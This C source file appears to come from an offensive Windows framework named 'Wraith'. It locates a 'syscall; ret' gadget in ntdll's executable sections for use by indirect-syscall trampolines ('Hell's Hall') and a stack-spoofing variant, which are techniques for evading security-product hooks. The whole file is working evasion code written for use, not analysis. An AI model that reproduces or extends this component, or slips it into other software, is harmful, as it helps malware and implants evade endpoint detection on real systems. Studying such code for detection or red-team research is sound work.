/*
 * src/syscalls/sc_gadget_finder.c
 *
 * Walk ntdll's section table, locate the .text section, and scan its
 * bytes for the canonical `syscall; ret` (0x0f 0x05 0xc3) sequence
 * generated by every standard Nt* prologue.
 *
 * The first match isn't always good enough: a candidate inside a
 * section flagged IMAGE_SCN_MEM_EXECUTE can still land on a page that
 * the live VM mapping treats as non-executable (per-page loader-
 * applied resets, third-party hooks flipping pages to RW, holes in
 * .text on systems with HVCI/CIG quirks). The asm trampoline does
 * `jmp qword ptr [rip + g_gadget]`; if the destination page is NX
 * every syscall through Hell's Hall faults at the gadget address with
 * ExceptionAddress == FaultAddress (DEP/NX), notoriously hard to
 * attribute because the crash is *inside ntdll's address space* but
 * with no stack frame in our code visible.
 *
 * We therefore VirtualQuery each candidate and skip non-executable
 * pages, falling through to the next match in the same section (or
 * the next executable section).
 */

#include "syscalls/sc_gadget_finder.h"
#include "core/wr_ptr_check.h"

#include <string.h>
#include <windows.h>

static int gadget_page_is_executable(const void *p)
{
  MEMORY_BASIC_INFORMATION mbi;
  SIZE_T qb = VirtualQuery(p, &mbi, sizeof(mbi));
  if (qb < sizeof(mbi)) {
  return 0;
  }
  if (mbi.State != MEM_COMMIT) {
  return 0;
  }
  const DWORD exec_mask = PAGE_EXECUTE | PAGE_EXECUTE_READ
                        | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
  return (mbi.Protect & exec_mask) ? 1 : 0;
}

wraith_status_t wr_sc_find_syscall_gadget(void *ntdll_base, void **out_gadget)
{
  if (!wr_looks_like_valid_base(ntdll_base) || !out_gadget) {
  return WRAITH_E_NULL_ARG;
  }
  *out_gadget = NULL;

  uint8_t *base = (uint8_t *)ntdll_base;
  PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
  if (dos->e_magic != IMAGE_DOS_SIGNATURE) {
  return WRAITH_E_SC_NO_GADGET;
  }
  /* Sanity-check e_lfanew before adding it to base: a corrupted DOS
  * header could give us a value that lands `nt` outside the image. */
  if (dos->e_lfanew <= 0 || dos->e_lfanew > 0x10000) {
  return WRAITH_E_SC_NO_GADGET;
  }
  PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(base + dos->e_lfanew);
  if (nt->Signature != IMAGE_NT_SIGNATURE) {
  return WRAITH_E_SC_NO_GADGET;
  }

  /* Find .text. We don't trust the section name string blindly - we
  * pick the first executable section, which is always .text on
  * standard ntdll builds. */
  PIMAGE_SECTION_HEADER s = IMAGE_FIRST_SECTION(nt);
  for (WORD i = 0; i < nt->FileHeader.NumberOfSections; ++i, ++s) {
  if (!(s->Characteristics & IMAGE_SCN_MEM_EXECUTE)) {
  continue;
  }
  const uint8_t *p  = base + s->VirtualAddress;
  const uint8_t *end = p + s->Misc.VirtualSize;
  if ((uintptr_t)end < (uintptr_t)p) {
  return WRAITH_E_SC_NO_GADGET;  /* overflow guard */
  }
  for (const uint8_t *q = p; q + 3 <= end; ++q) {
  if (q[0] == 0x0f && q[1] == 0x05 && q[2] == 0xc3) {
  /* Verify the candidate's live page protection. Both
  * the gadget address (q) and the synthesised ret-only
  * gadget at q+2 (used by the stack-spoof variant) live
  * on the same page, so a single VirtualQuery is enough.
  * Skip and keep searching if the page is currently NX. */
  if (gadget_page_is_executable(q)) {
  *out_gadget = (void *)q;
  return WRAITH_OK;
  }
  }
  }
  }
  return WRAITH_E_SC_NO_GADGET;
}
